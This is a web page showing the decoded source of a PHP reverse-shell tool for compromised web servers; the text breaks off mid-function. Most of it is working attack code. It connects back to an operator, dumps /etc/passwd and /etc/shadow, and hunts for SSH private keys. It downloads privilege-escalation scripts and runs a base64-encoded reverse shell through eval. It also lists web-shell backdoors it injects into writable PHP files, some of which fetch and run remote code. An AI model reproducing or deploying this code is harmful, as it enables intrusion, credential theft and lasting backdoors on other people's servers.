Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
# YAPS - Yet Another PHP Shell # Version 1.3.1 - 01/08/21 # Made by Nicholas Ferreira # ht..
Decoded Output download
# YAPS - Yet Another PHP Shell
# Version 1.3.1 - 01/08/21
# Made by Nicholas Ferreira
# https://github.com/Nickguitar/YAPS
//error_reporting(0);
$version = "1.3.1";
set_time_limit(0);
ignore_user_abort(1);
ini_set('max_execution_time', 0);
ini_set('default_socket_timeout', pow(99, 6)); //negative timeout value should set it to infinite, but it doesn't. =(
########################## CONFIGS ############################
$resources = array(
"linpeas" => "https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh",
"linenum" => "https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh",
"suggester" => "https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh",
"verifyUpdateURL" => "https://raw.githubusercontent.com/Nickguitar/YAPS/main/version",
"updateURL" => "https://raw.githubusercontent.com/Nickguitar/YAPS/main/yaps.php");
$ip = '127.0.0.1';
$port = 7359;
$ps1_color = true; // colored prompt (prettier :)
$color = true; // prompt, banner, info colors (better readability)
$use_password = false; // only allows remote using the shell w/ password
// sha512("vErY_Go0d_$aLt".sha512("password123"))
$salt = 'v_3_r_Y___G_o_0_d___s_4_L_t';
$pass_hash = "f00945860424fa6148e329772c08e7d05d7fab6f69a4722b4c66c164acdb018ecc0cbc62060cc67e7ae962c65ab5967620622cc12206627229b94106b66db6b8"; // default: pass123
$auto_verify_update = false; // if true, will check on every run for update
$silent = false; //if true, does not display banner on connect
if(isset($_GET['vrfy'])) die("baguvix"); //verification
######################### END CONFIGS #########################
$yaps = $_SERVER['SCRIPT_FILENAME'];
// sets reverse socket via $_POST['x'] (stealthier, no IP on apache log request line)
if(isset($_POST['x']) && strpos($_POST['x'], ":") !== false){
$skt = explode(":", $_POST['x']);
$ip = $skt[0];
$port = $skt[1];
}
$banner = cyan('
o o O o--o o-o
\ / / \ | ) (
O o---o O--o o-o
| | | | )
o o o o o--o
Yet Another PHP Shell').'
Version '.$version.'
Coder: Nicholas Ferreira';
########################## PARSE ARGV ########################
$short_args = "u::h::s::";
$long_args = array("update::","help::","silent::");
$options = getopt($short_args, $long_args);
if(isset($options['h']) || isset($options['help'])) die(usage());
if(isset($options['u']) || isset($options['update'])) die(verify_update());
if(isset($options['s']) || isset($options['silent'])) $silent = true;
if(php_sapi_name() == "cli"){ // if yaps is run via cli, parse args
if($argc >= 2 && preg_match("/^[0-9]+$/", $argv[$argc-1])){ // $ php yaps.php 127.0.0.1 4444
$port = $argv[$argc-1];
$ip = $argv[$argc-2];
}else{
foreach($argv as $arg){
if(strpos($arg, ":") !== false){ // if an argument is of the form .*:[0-9]+
$socket = explode(":", $arg);
$ip = $socket[0];
$port = (int)$socket[1];
}
}
}
}
##################### END ARGV PARSING ######################
$commands = array(
"all-colors",
// "backdoor",
"color",
// "download",
"duplicate",
"enum",
"help",
"infect",
"info",
"passwd",
"php",
"stabilize",
"suggester"
// "upload"
);
function green($str){
global $color;
return $color ? "\e[92m".$str."\e[0m" : $str;
}
function red($str){
global $color;
return $color ? "\e[91m".$str."\e[0m" : $str;
}
function yellow($str){
global $color;
return $color ? "\e[93m".$str."\e[0m" : $str;
}
function cyan($str){
global $color;
return $color ? "\e[96m".$str."\e[0m" : $str;
}
function white($str){
global $color;
return $color ? "\e[97m".$str."\e[0m" : $str;
}
function banner(){
global $banner;
return $banner.white('
This is ').red('NOT').white(' an interactive shell.
Use ').green('!help').white(' to see commands.');
}
function usage(){
global $banner,$version;
return $banner.'
'.yellow('Usage:').white('
There are three ways you can start the connection:
').green('1. Via command line in the compromised host;').'
E.g: $ php yaps.php [options] [ip port|ip:port]
'.green('2. Making a POST request to the file with the parameter "x";').'
E.g: $ curl -X POST -d "x=192.168.73.59:7359" hacked.com/uploads/yaps.php
'.green('3. Making a GET request without parameters (will connect to the hardcoded socket);').'
E.g: $ curl hacked.com/uploads/yaps.php
'.yellow('Options:').white('
-h, --help: Show this help
-s, --silent: Silent mode (does not display banner)
-u, --update: Check if YAPS is up to date
').yellow('Examples (suppose your IP is 192.168.73.59):').'
infected@host:~$ php yaps.php -s 192.168.73.59 4444
infected@host:~$ php yaps.php 192.168.73.59:8080
your@machine:~$ curl -X POST -d "x=192.168.73.59" hacked.com/uploads/yaps.php
';
}
function isAvailable($function){
$dis = ini_get('disable_functions');
if(!empty($dis)){
$dis = preg_replace('/[, ]+/', ',', $dis);
$dis = explode(',', $dis); // split by comma
$dis = array_map('trim', $dis); //remove whitespace at the beginning and end
}else{
$dis = array();
}
if(is_callable($function) and !in_array($function, $dis))
return true;
return false;
}
function help(){
$help = '
'.green('Useful commands:').'
'.cyan('!help').'
Display this menu
'.cyan('!all-colors').'
Toggle all colors (locally only)
'.cyan('!color').'
Toggle $PS1 color (locally only)
'.cyan('!duplicate').'
Spawn another reverse shell
'.cyan('!enum').'
Download Linpeas and Linenum to /tmp and get it ready to run
'.cyan('!infect').'
Inject payloads into PHP files
'.cyan('!info').'
List information about target
'./*cyan('!download <target file>').'
Downloads file from target to your PC
'.cyan('!upload <source> <destination>').'
Uploads a source file from your PC to target destination folder
'.*/cyan('!passwd').'
Show options for password
'.cyan('!php').'
Write and run PHP code on the remote host
'.cyan('!stabilize').'
Stabilize to an interactive shell
'.cyan('!suggester').'
Download Linux Exploit Suggester to /tmp and get it ready to run
'.green('Command line options:').'
'.white('$ php yaps.php [--update|-u]').'
Check if YAPS is up to date
'.white('$ php yaps.php ip port').'
Connect to ip:port
';
return $help;
}
function run_cmd($c){ // modified from msf
$c = $c." 2>&1
"; // stderr to stdout
if(isAvailable('exec')){
$stdout = array();
exec($c, $stdout);
$stdout = join(chr(10),$stdout).chr(10);
}else if(isAvailable('shell_exec')){
$stdout = shell_exec($c);
}else if(isAvailable('popen')){
$fp = popen($c, 'r');
$stdout = NULL;
if(is_resource($fp))
while (!feof($fp))
$stdout .= fread($fp, 1024);
@pclose($fp);
}else if(isAvailable('passthru')){
ob_start();
passthru($c);
$stdout = ob_get_contents();
ob_end_clean();
}else if(isAvailable('proc_open')){
$handle = proc_open($c, array(
array('pipe','r') ,
array('pipe','w') ,
array('pipe','w')
) , $pipes);
$stdout = NULL;
while (!feof($pipes[1]))
$stdout .= fread($pipes[1], 1024);
@proc_close($handle);
}else if(isAvailable('system')){
ob_start();
system($c);
$stdout = ob_get_contents();
ob_end_clean();
}else{
$stdout = 0;
}
return $stdout;
}
$ps1 = "[YAPS] ".str_replace(PHP_EOL,"",green(run_cmd("whoami")."@".run_cmd("hostname")).":".cyan(run_cmd("pwd"))."$ "); // user@hostname:~$
function sysinfo(){
global $s;
fwrite($s,green("
====================== Initial info ======================
"));
$info = cyan("[i] OS info:
").run_cmd("lsb_release -a | grep -v 'No LSB'").PHP_EOL;
$info .= cyan("[i] Hostname: ").run_cmd("hostname");
$info .= cyan("[i] Kernel: ").run_cmd("uname -a");
$info .= cyan("[i] CPU:
").run_cmd("cat /proc/cpuinfo | grep -i 'model name' | cut -d':' -f 2 | sed 's/^ *//g'");
$info .= cyan("[i] RAM:
").run_cmd("cat /proc/meminfo | egrep -i '(memtotal|memfree)'");
$info .= cyan("[i] Sudo version: ").run_cmd("sudo --version | grep 'Sudo version' | cut -d' ' -f 3");
$info .= cyan("[i] User/groups: ").run_cmd("id").PHP_EOL;
$info .= cyan("[i] Active TTY:
").run_cmd("w").PHP_EOL;
fwrite($s, $info);
fwrite($s,green("====================== Users info ======================
"));
$info = cyan("[i] Current user: ").run_cmd("whoami");
$info .= cyan("[i] Users in /home:
").run_cmd("ls /home").PHP_EOL;
$info .= cyan("[i] Crontab of current user:
").run_cmd("crontab -l | egrep -v '^#'").PHP_EOL;
$info .= cyan("[i] Crontab:
").run_cmd("cat /etc/crontab | egrep -v '^#'").PHP_EOL;
fwrite($s, $info);
fwrite($s,green("====================== All users ======================
"));
fwrite($s, run_cmd("cat /etc/passwd").PHP_EOL);
if(is_readable("/etc/shadow"))
fwrite($s, red("[!] /etc/shadow is readable!
").run_cmd("cat /etc/shadow").PHP_EOL);
fwrite($s, green("====================== Net info ======================
"));
$info = cyan("[i] IP Info:
").run_cmd("ifconfig").PHP_EOL;
$info .= cyan("[i] Hosts:
").run_cmd("cat /etc/hosts | grep -v '^#'").PHP_EOL; // /etc/hosts file
$info .= cyan("[i] Interfaces/routes:
").run_cmd("cat /etc/networks && route").PHP_EOL;
$info .= cyan("[i] IP Tables rules:
").run_cmd("(iptables --list-rules 2>/dev/null)").PHP_EOL;
$info .= cyan("[i] Active ports:
").run_cmd("(netstat -punta) 2>/dev/null").PHP_EOL; //established, listening, 0.0.0.0, 127.0.0.1
fwrite($s, $info);
fwrite($s, green("====================== Interesting binaries ======================
"));
$interesting_binaries = array('nc','nc.traditional','ncat','nmap','perl','python','python2','python2.6','python2.7','python3','python3.6','python3.7','ruby','node','gcc','g++','docker','php');
foreach($interesting_binaries as $binary) {
$binary = shell_exec("which $binary 2>/dev/null");
if($binary !== "" && base64_encode($binary.PHP_EOL) !== "Cg==") // if not empty or newline
fwrite($s, run_cmd("ls -l $binary"));
}
fwrite($s, green("
====================== SUID binaries ======================
"));
$suid_list = explode("
",shell_exec("find / -type f -perm /4000 2>/dev/null"));
foreach($suid_list as $suid)
if($suid !== "")
fwrite($s, run_cmd("ls -l $suid"));
fwrite($s, green("
====================== SSH files ======================
"));
$authorized_keys = explode("
",shell_exec("find / -type f -name authorized_keys 2>/dev/null")); // search for authorized_keys file
foreach($authorized_keys as $public_key)
if(is_writable($public_key))
fwrite($s, red("[Writable] ").$public_key.PHP_EOL);
else
fwrite($s, $public_key.PHP_EOL);
$id_rsa = explode("
",shell_exec("find / -type f -name id_rsa 2>/dev/null")); // search for id_rsa files
foreach($id_rsa as $priv_key)
if(is_readable($priv_key))
fwrite($s, red("[Readable] ").$priv_key.PHP_EOL);
else
fwrite($s, $priv_key.PHP_EOL);
fwrite($s, green("
=================== Writable PHP files ===================
"));
$webfiles_arr = array();
$webdir = array('/var/www','/srv','/usr/local/apache2','/var/apache2','/var/www/nginx-default');
foreach($webdir as $dir)
$webfiles_arr = array_merge($webfiles_arr, explode("
", shell_exec("find ".$dir." -type f -name '*.php*' -writable 2>/dev/null")));
if(count($webfiles_arr) > 25){
for($i=0;$i<25;$i++)
if($webfiles_arr[$i] !== "")
fwrite($s, red("[Writable] ").$webfiles_arr[$i].PHP_EOL);
fwrite($s, "...
...".PHP_EOL);
fwrite($s, green("[+] "). "Showing only the first 25 files. There are more!".PHP_EOL);
}else{
foreach($webfiles_arr as $file)
if($file !== "")
fwrite($s, red("[Writable] ").$file.PHP_EOL);
}
fwrite($s, cyan("
[i]")." Get more information with !enum.".PHP_EOL);
}
function random_name($name = ""){
$charset = implode("",array_merge(range("A", "Z"), range("a","z"), range(0,9))); // merge arrays and join them into a string
for($i=0;$i<=mt_rand(5,6);$i++)
$name .= $charset[mt_rand(0,strlen($charset)-1)];
return $name;
}
function download($url, $saveTo){ //download file from $url to $saveTo
$randomName = random_name();
$content = get_request($url);
if(isAvailable('file_put_contents'))
if(file_put_contents($saveTo."/".$randomName,$content)) return $randomName;
if(isAvailable('fopen') && isAvailable('fwrite') && isAvailable('fclose')){
$fp = fopen($saveTo."/".$randomName, "w");
if(fwrite($fp, $content)){
fclose($fp);
return $randomName;
}
}
return false;
}
function enum(){ //download linpeas, save to /tmp and change its permission to 777
global $s, $resources;
$downloadLinpeas = download($resources["linpeas"], "/tmp/");
$downloadLinenum = download($resources["linenum"], "/tmp");
if($downloadLinpeas){
fwrite($s, green("[+]")." Linpeas saved to /tmp/".$downloadLinpeas.cyan("
[i] Changing permissions...
"));
if(chmod("/tmp/".$downloadLinpeas, 777))
fwrite($s, green("[+]")." Permissions changed!
[i] You can run it with ".yellow("sh /tmp/".$downloadLinpeas." | tee /tmp/linpeas.log
"));
else
fwrite($s, yellow("[!]")." Couldn't change permissions...
[i] File was saved in ".yellow("/tmp/".$downloadLinpeas."
"));
}
if($downloadLinenum){
fwrite($s, green("[+] Linenum saved to /tmp/".$downloadLinenum).cyan("
[i] Changing permissions...
"));
if(chmod("/tmp/".$downloadLinenum, 777))
fwrite($s, green("[+]")." Permissions changed!
[i] You can run it with ".yellow("sh /tmp/".$downloadLinenum." | tee /tmp/linenum.log
"));
else
fwrite($s, yellow("[!]")." Couldn't change permissions...
[i] File was saved in ".yellow("/tmp/".$downloadLinenum."
"));
}
}
function suggester(){//download linux exploit suggester, save to /tmp and change its permission to 777
global $s, $resources;
$download = download($resources["suggester"], "/tmp/");
if($download){
fwrite($s, green("[+]")." Linux Exploit Suggester saved to /tmp/".$download.cyan("
[i]")." Changing permissions...
");
if(chmod("/tmp/".$download, 777))
fwrite($s, green("[+]")." Permissions changed!
[i] You can run it with ".yellow("sh /tmp/".$download." | tee /tmp/LES.log
"));
else
fwrite($s, yellow("[!]")." Couldn't change permissions...
[i] File was saved in ".yellow("/tmp/".$download."
"));
}
return;
}
function refresh_ps1($changecolor=false){ //build a nice PS1, toggle between colored and not colored
global $ps1_color,$ps1;
$user = str_replace(PHP_EOL, "", run_cmd("whoami"));
if(!$ps1_color){
$ps1 = white("[YAPS] ").str_replace(PHP_EOL,"",green($user."@".run_cmd("hostname")).":".cyan(run_cmd("pwd"))."$ "); // user@hostname:~$
if($user == "root") $ps1 = white("[YAPS] ").str_replace(PHP_EOL,"",red($user."@".run_cmd("hostname")).":".cyan(run_cmd("pwd"))."# "); // root@hostname:~#
if($changecolor) $ps1_color = true;
}else{
$ps1 = white("[YAPS] ").str_replace(PHP_EOL,"",$user."@".run_cmd("hostname").":".run_cmd("pwd")."$ "); // user@hostname:~$
if($user == "root") $ps1 = white("[YAPS] ").str_replace(PHP_EOL,"",$user."@".run_cmd("hostname").":".run_cmd("pwd")."# "); // root@hostname:~#
if($changecolor) $ps1_color = false;
}
}
function getPHP(){ //receive PHP code via socket
global $s;
$php = '';
fwrite($s, cyan("[*]")." Write your PHP code (*without* PHP tags). To send and run it, use ".green("!php").". ".yellow("
[i] Note that this is NOT an interactive PHP shell. Max input: 4096 bytes.").white("
php> "));
while($c = fread($s, 4096)){
if(substr($c,0,-1) == "!php") // remove newline at end
return $php;
if(substr($c,0,-1) == "!cancel") // remove newline at end
return 0;
fwrite($s, white("php> ")); //prompt
$php .= $c; // append received line to the whole php code to be executed
}
return $php;
}
function runPHP($code){ // guess what
try{
ob_start();
eval($code); // do the magic
$result = ob_get_contents(); //get buffer from eval() to return later
ob_end_clean();
}catch (Throwable $ex){
$err = explode("Stack trace:", $ex);
$result = $err[0]; //return the error
}
return $result;
}
function stabilize($post_socket=""){ // spawn an interactive shell
global $s, $port, $ip;
$payload = "JHNjcmlwdD1zaGVsbF9leGVjKCJ3aGljaCBzY3JpcHQiKTskcHkzPXNoZWxsX2V4ZWMoIndoaWNoIHB5dGhvbjMiKTskcHk9c2hlbGxfZXhlYygid2hpY2ggcHl0aG9uIik7aWYoc3RybGVuKCRzY3JpcHQpPjYgJiYgc3RycG9zKCRzY3JpcHQsIm5vdCBmb3VuZCIpPT1mYWxzZSkgJHN0YWJpbGl6ZXI9Ii9iaW4vYmFzaCAtY2kgJyIuJHNjcmlwdC4iIC1xYyAvYmluL2Jhc2ggL2Rldi9udWxsJyI7ZWxzZSBpZihzdHJsZW4oJHB5Myk+NyAmJiBzdHJwb3MoJHNjcmlwdCwibm90IGZvdW5kIik9PWZhbHNlKSAkc3RhYmlsaXplcj0kcHkzLiIgLWMgJ2ltcG9ydCBwdHk7cHR5LnNwYXduKFwiL2Jpbi9iYXNoXCIpJyI7ZWxzZSBpZihzdHJsZW4oJHB5KT42ICYmIHN0cnBvcygkc2NyaXB0LCJub3QgZm91bmQiKT09ZmFsc2UpICRzdGFiaWxpemVyPSRweS4iIC1jICdpbXBvcnQgcHR5O3B0eS5zcGF3bihcIi9iaW4vYmFzaFwiKSciO2Vsc2UgJHN0YWJpbGl6ZXI9Ii9iaW4vYmFzaCI7JHN0YWJpbGl6ZXI9c3RyX3JlcGxhY2UoIlxuIiwiIiwkc3RhYmlsaXplcik7JHNoZWxsPSJ1bmFtZSAtYTskc3RhYmlsaXplciI7dW1hc2soMCk7JHNvY2s9ZnNvY2tvcGVuKCJJUF9BRERSIixQT1JULCRlcnJubywkZXJyc3RyLDMwKTskc3RkPWFycmF5KCAwID0+IGFycmF5KCJwaXBlIiwiciIpLDEgPT4gYXJyYXkoInBpcGUiLCJ3IiksMiA9PiBhcnJheSgicGlwZSIsInciKSApOyRwcm9jZXNzPXByb2Nfb3Blbigkc2hlbGwsJHN0ZCwkcGlwZXMpO2ZvcmVhY2goJHBpcGVzIGFzICRwKSBzdHJlYW1fc2V0X2Jsb2NraW5nKCRwLDApO3N0cmVhbV9zZXRfYmxvY2tpbmcoJHNvY2ssMCk7d2hpbGUoIWZlb2YoJHNvY2spKXskcmVhZF9hPWFycmF5KCRzb2NrLCRwaXBlc1sxXSwkcGlwZXNbMl0pO2lmKGluX2FycmF5KCRzb2NrLCRyZWFkX2EpKSBmd3JpdGUoJHBpcGVzWzBdLGZyZWFkKCRzb2NrLDIwNDgpKTtpZihpbl9hcnJheSgkcGlwZXNbMV0sJHJlYWRfYSkpIGZ3cml0ZSgkc29jayxmcmVhZCgkcGlwZXNbMV0sMjA0OCkpO2lmKGluX2FycmF5KCRwaXBlc1syXSwkcmVhZF9hKSkgZndyaXRlKCRzb2NrLGZyZWFkKCRwaXBlc1syXSwyMDQ4KSk7fSBmY2xvc2UoJHNvY2spO2ZvcmVhY2goJHBpcGVzIGFzICRwKSBmY2xvc2UoJHApO3Byb2NfY2xvc2UoJHByb2Nlc3MpOw==";// modified php-reverse-shell (works w/ sudo, mysql, ftp, su, etc.)
if(strlen($post_socket) > 1 && strlen($post_socket) > 0){ //if is set
echo $post_socket;
$skt = explode(":", $post_socket);
$post_ip = $skt[0];
$post_port = $skt[1];
$final_payload = base64_encode(str_replace("IP_ADDR", $post_ip, str_replace("PORT", $post_port, base64_decode($payload)))); // changes payload to add correct socket
shell_exec("echo ".$final_payload."| base64 -d | php -r '\$stdin=file(\"php://stdin\");eval(\$stdin[0]);'");
return;
}
fwrite($s, yellow("[i]")." Set up a listener on another port (nc -lnvp <port>) and press ENTER.
Choose a port: ");
while($c = fread($s, 8)){ //reads [ENTER]
if(strlen($c) > 0){ // got [ENTER]
$recv_port = (int)$c; // get the integer part
if($recv_port>65535 || $recv_port==0){
fwrite($s,red("[-]")." Port must be between 0-65535.
Choose another port: ");
}else{
$final_payload = base64_encode(str_replace("IP_ADDR", $ip, str_replace("PORT", $recv_port, base64_decode($payload)))); // changes payload to add correct socket
fwrite($s, yellow("[i]")." Trying to connect to $ip:$recv_port
");
if(isAvailable("popen") && isAvailable("pclose")){
pclose(popen("echo ".$final_payload."| base64 -d | php -r '\$stdin=file(\"php://stdin\");eval(\$stdin[0]);' &",'r')); // does the magic
return;
}
// in case we don't have popen or pclose
$curl_url = $_SERVER["REQUEST_SCHEME"]."://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]; // htt(p|ps) :// website.com /files/yaps.php
run_cmd("timeout --kill-after 0 1 wget --post-data=\"x=$ip:$recv_port&stabilize=1\" $curl_url > /dev/null"); // thx znttfox =)
return;
}
}
}
}
function backdoor(){
// todo
}
function check_password(){ //ask for password and return 0 or 1
global $s, $pass_hash, $salt;
fwrite($s, yellow("[i] ")."This shell is protected.
Enter the password: ");
while($data = fread($s,1024)){
$entered_pass = substr($data,0,-1); //remove newline at end
return hash("sha512", $salt.hash("sha512",$entered_pass, false), false) == $pass_hash ? true : false;
}
}
function change_password($new){
global $salt, $yaps, $s;
$new_hash = hash("sha512", $salt.hash("sha512",$new, false), false);
if(!is_readable($yaps) || !is_writable($yaps)) return false; //someone changed the permission
$yaps_code = file_get_contents($yaps);
$new_yaps_code = preg_replace('/[a-f0-9]{128}/', $new_hash, $yaps_code, 1); // the password hash is be the first thing this regex should match
if(file_put_contents($yaps, $new_yaps_code)){
fwrite($s, green("[+] ")."Password changed. Changes will take effect on next connection.
");
return true;
}else{
fwrite($s, red("[-] ")."Couldn't read or write the file. Are the permissions right?
" . run_cmd("ls -l ".$yaps."
"));
return false;
}
}
function toggle_password(){
global $use_password, $s, $yaps;
$yaps_code = file_get_contents($yaps);
if($use_password){ //password currently active
$new_yaps_code = preg_replace('/(\$use_password += +)(true)/', '$1false', $yaps_code, 1);
if(file_put_contents($yaps, $new_yaps_code)){
$use_password = false;
fwrite($s, green("[+] ")."Password deactivated.
");
return true;
}
fwrite($s, red("[-] ")."Couldn't deactivate password.
");
return false;
}
// will enter here if $use_password is false
$new_yaps_code = preg_replace('/(\$use_password += +)(false)/', '$1true', $yaps_code, 1); //limit must be 1
if(file_put_contents($yaps, $new_yaps_code)){
$use_password = false; // if limit isn't 1, this will be changed to false too
fwrite($s, green("[+] ")."Password activated.
");
return true;
}
fwrite($s, red("[-] ")."Couldn't activate password.
");
return false;
}
function passwd(){
global $s,$use_password;
if($use_password){
if(!check_password()){
fwrite($s, red("[-] ")." Wrong password
");
return;
}
fwrite($s, green("[+] Password is enabled. ").white("Choose an option:")."
[1] Change password
[2] Disable password
[3] Cancel
> ");
while($data = fread($s, 8)){
switch(substr($data, 0, -1)){
case "1": // change password
fwrite($s,cyan("[*] ")."Choose the new password: ");
while($data2 = fread($s, 1024)){
$newPass = substr($data2, 0, -1); //remove newline at end
change_password($newPass);
return;
}
break;
case "2": // disable password
toggle_password();
return;
break;
default:
fwrite($s, cyan("[*] ")."Canceled.
");
return;
break;
}
}
}else{ // no password required
fwrite($s, yellow("[!] Password is disabled. ").white("Choose an option:")."
[1] Set a password
[2] Enable password
[3] Cancel
> ");
while($data = fread($s, 8)){
switch(substr($data, 0, -1)){
case "1": // set a new password
fwrite($s,cyan("[*] ")."Choose the new password: ");
while($data2 = fread($s, 1024)){
$newPass = substr($data2, 0, -1); //remove newline at end
change_password($newPass);
return;
}
break;
case "2": // enable password
toggle_password();
return;
break;
default:
fwrite($s, cyan("[*] ")."Canceled.
");
return;
break;
}
}
}
}
function duplicate(){
global $s,$ip,$port,$_SERVER;
if(!isset($_SERVER["REQUEST_SCHEME"]) || !isset($_SERVER["HTTP_HOST"]) || !isset($_SERVER["REQUEST_URI"])){
fwrite($s, yellow("[-] ")."Couldn't find YAPS URL. Did you run me via command line?
Please provide the correct YAPS URL (example.com/files/yaps.php): ");
while($yaps_url = fread($s, 256)){
if(get_request(preg_replace("/
/", "",$yaps_url."?vrfy")) !== "baguvix")
return fwrite($s, red("[-] ")."Couldn't validade YAPS URL. Is this the correct URL?
");
break;
}
$curl_url = $yaps_url;
}else{
$curl_url = $_SERVER["REQUEST_SCHEME"]."://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]; // htt(p|ps) :// website.com /files/yaps.php
echo $curl_url;
}
fwrite($s, cyan("[*] ")."Choose a port to listen (default: $port): ");
while($new_port = fread($s, 32)){
$new_port = (base64_encode($new_port) == "Cg==") ? $port: substr($new_port,0,-1); //if new_port= newline, new_port = old port
$socket = array('x' => $ip.":".$new_port);
fwrite($s, "Connecting to ".$ip.":".$new_port."
");
$cmd = "wget -qO- --post-data=\"".http_build_query($socket)."\" $curl_url > /dev/null";
if(isAvailable("popen") && isAvailable("pclose"))
pclose(popen($cmd." &",'r')); // doesn't wait for wget to return
else
run_cmd("timeout --kill-after 0 1 ".$cmd); // thx znttfox =)
return;
}
}
function get_request($url){ //todo: change download function
$response = false;
if(isAvailable("file_get_contents")){
$response = file_get_contents($url);
}elseif(isAvailable("fread") && isAvailable("fopen") && ini_get("allow_url_fopen")){
$response = fread(fopen($url, "r"),10);
}elseif(in_array("curl",get_loaded_extensions())){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);
curl_close($ch);
}elseif($tmp_curl = run_cmd("curl -s ".$url)){
$response = $tmp_curl;
}elseif($tmp_wget = run_cmd("wget -qO- ".$url)){
$response = $tmp_wget;
}
return $response;
}
function verify_update(){
global $version, $resources;
$newest_version = 0;
echo cyan("[i] ")."Your version: $version. Checking for updates...
";
$request = get_request($resources["verifyUpdateURL"]);
if($request) $newest_version = $request;
$newest_version_ = (int)str_replace(".","",$newest_version); //get only numbers
$version_ = (int)str_replace(".","",$version);
if($newest_version_ !== 0 && $newest_version_ > $version_){
echo red("[i]")." Your version is not up to date.
".green("[DOWNLOAD v".str_replace("
","",$newest_version)."]: ").$resources["updateURL"]."
";
return;
}
echo green("[+] ")."YAPS is already up to date (v$version)!
";
return;
}
function getFiles($dir){ // return writable php files on webserver root
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir)); //list recursively
$list = array();
foreach($iterator as $file)
if(!is_dir($file) && is_writable($file)) //list only writable files
if($file->getPathName() !== $_SERVER["SCRIPT_FILENAME"]) //remove myself from list
if(substr($file->getPathName(),-4) == ".php") //list only php files
array_push($list,$file->getPathName());
sort($list);
return $list;
}
function select_files(){
global $s;
$webdir = array('/var/www/','/srv/','/usr/local/apache2/','/var/apache2/','/var/www/nginx-default/');
$webfiles_arr = array();
foreach($webdir as $dir)
try{
$list = getFiles($dir);
$webfiles_arr = array_merge($webfiles_arr,$list);
}catch(Exception $e){}
if(count($webfiles_arr) > 0) fwrite($s, cyan("[*] ").white("Found ".count($webfiles_arr)." writable PHP files:
"));
for($i=0;$i<count($webfiles_arr);$i++)
fwrite($s, red("[$i] ").$webfiles_arr[$i].PHP_EOL);
fwrite($s,cyan("
[*] ").white("Choose the files you want to infect.
Separate by comma (e.g:1,5,7,8) and/or by range (e.g:10-16).
Files: "));
while($data2 = fread($s, 1024)){ //receive numbers and parse
$files = str_replace(" ", "", substr($data2, 0, -1)); //remove whitespaces and newline at end
$files = explode(",",$files); //split
if(count($files) == 1 && $files[0] == "") return; //no file selected
$toInfect = array();
foreach($files as $file){
if(preg_match("/^[0-9]+$/",$file)) // filter numbers
array_push($toInfect, $file);
if(preg_match("/^[0-9]+\-[0-9]+$/",$file)){ // filter ranges
$range = explode("-",$file); // ex:4-6 -> $range[0]=4, $range[1]=6
if((int)$range[0] < (int)$range[1]) // 4 must be < than 6
for($i=(int)$range[0];(int)$i<=$range[1];$i++) // from i=4 to i=6
array_push($toInfect, $i);
}
}
sort($toInfect,SORT_NUMERIC);
choose_payload($webfiles_arr,array_unique($toInfect)); //remove duplicates
return;
}
}
function choose_payload($allFiles,$toInfect){
global $s;
$payloads = array(
//curl -d "0=whoami" website.com/infected_file.php
//curl website.com/infected_file.php?0=whoami
"0. TinyRCE " => '<?=`$_REQUEST[0]`;?>',
//same
"1. ClassicRCE " => '<?=@system($_REQUEST[0]);?>',
//curl -d "0=phpinfo();" website.com/infected_file.php
"2. Eval " => '<?=@eval($_REQUEST[0]);?>',
//curl -d "0=cGhwaW5mbygpOw==" website.com/infected_file.php (encoded phpinfo())
"3. BasedEval " => '<?=@eval(base64_decode($_REQUEST[0]));?>',
//curl -d "0=c2.com/file_to_be_executed.txt" website.com/infected_file.php
"4. RemotePHP " => '<?=@eval(file_get_contents($_REQUEST[0]));?>',
//curl -d "0=c2.com/file_to_upload&1=extension" website.com/infected_file.php
"5. RemoteUpload " => '<?=$hzjt0=rand(100,999);@file_put_contents(base64_decode('Li8=').$hzjt0.base64_decode('Lg==').$_REQUEST[1],@file_get_contents($_REQUEST[0]));echo $hzjt0.$_REQUEST[1];?>',
//curl -F "0=@file_to_upload.php" website.com/infected_file.php
"6. LocalUpload " => '<?php if(isset($_FILES[base64_decode('MA==')]))if(move_uploaded_file($_FILES[base64_decode('MA==')][base64_decode('dG1wX25hbWU=')],base64_decode('Xw==').$_FILES[base64_decode('MA==')][base64_decode('bmFtZQ==')]))echobase64_decode('VXBsb2FkZWQ6IF8=').$_FILES[base64_decode('MA==')][base64_decode('bmFtZQ==')];?>',
//curl "0=your_ip&1=port" website.com/infected_file.php
"7. StableShell " => '<?php $pqnu1=base64_decode('c2NyaXB0IC1xYyAvYmluL2Jhc2ggL2Rldi9udWxs');umask(0);$spaj2=fsockopen($_REQUEST[0],$_REQUEST[1],$fpae3,$lplh4,30);$iqrs5=array(0=>array(base64_decode('cGlwZQ=='),base64_decode('cg==')),1=>array(base64_decode('cGlwZQ=='),base64_decode('dw==')),2=>array(base64_decode('cGlwZQ=='),base64_decode('dw==')));$suoi6=proc_open($pqnu1,$iqrs5,$suuc7);foreach($suuc7 as $tokm8)stream_set_blocking($tokm8,0);stream_set_blocking($spaj2,0);while(!feof($spaj2)){$cqgs9=array($spaj2,$suuc7[1],$suuc7[2]);if(in_array($spaj2,$cqgs9))fwrite($suuc7[0],fread($spaj2,2048));if(in_array($suuc7[1],$cqgs9))fwrite($spaj2,fread($suuc7[1],2048));if(in_array($suuc7[2],$cqgs9))fwrite($spaj2,fread($suuc7[2],2048));}fclose($spaj2);foreach($suuc7 as $tokm8)fclose($tokm8);proc_close($suoi6);?>'
);
fwrite($s, cyan("
[i] ").white("List of payloads available:
"));
$i=true;
foreach($payloads as $name => $code){
$desc = $i ? cyan($name).$code : cyan($name).white($code);
fwrite($s, $desc."
");
$i = !$i; //toggle payload color
}
fwrite($s, cyan("
[?] ").white("Choose a payload to infect the selected files (default:0): "));
while($choosed_payload = fread($s, 128)){
$user_payload = 0;
if((int)$choosed_payload <= count($payloads)+1)
$user_payload = $choosed_payload;
break;
}
fwrite($s, cyan("[?] ").white("Do you want do insert the payload at the beginning [0] or end [1] of the file (default: 1)? "));
while($position = fread($s, 128)){
